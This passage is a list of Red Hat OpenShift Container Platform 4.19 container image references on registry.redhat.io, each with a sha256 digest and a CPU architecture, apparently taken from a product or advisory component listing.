"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
